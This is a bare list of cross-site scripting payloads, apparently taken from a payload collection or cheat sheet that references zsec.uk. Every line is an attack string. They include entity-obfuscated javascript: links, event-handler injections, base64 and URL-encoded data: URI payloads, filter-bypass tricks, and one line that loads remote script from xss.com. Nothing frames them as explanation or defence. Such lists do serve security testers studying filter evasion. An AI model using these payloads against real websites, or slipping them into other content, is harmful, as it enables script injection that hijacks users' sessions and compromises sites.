<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe</p>
<p><script x> alert</script 1=2</p>
<p><div/onmouseover='alert(1)'> style="x:"><br>
<--<code><img/src=</code> onerror=alert(1)> --!></p>
<p><a href="script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)">script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)</a></script></p>
<p><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button><br>
"><img src=x onerror=window.open('<a href="https://www.zsec.uk');>">https://www.zsec.uk');></a></p>
<p><form><button formaction=javascript:alert(1)>CLICKME</p>
<p><math><a xlink:href="//blog.zsec.uk">click</p>
<p><object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object></p>
<p><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
1Click Me
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eshadowlabs(0x000045)%3C/script%3E
<scr\0ipt/src=http://xss.com/xss.js</script
%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3ERWAR%280x00010E%29%3C%2Fscript%3E
' onmouseover=alert(/Black.Spook/)
">iframe%20src="http://blog.zsec.uk"%%203E
'<scriptwindow.onload=function(){document.forms[0].message.value='1';}</script>
x”</title><img src%3dx onerror%3dalert(1)>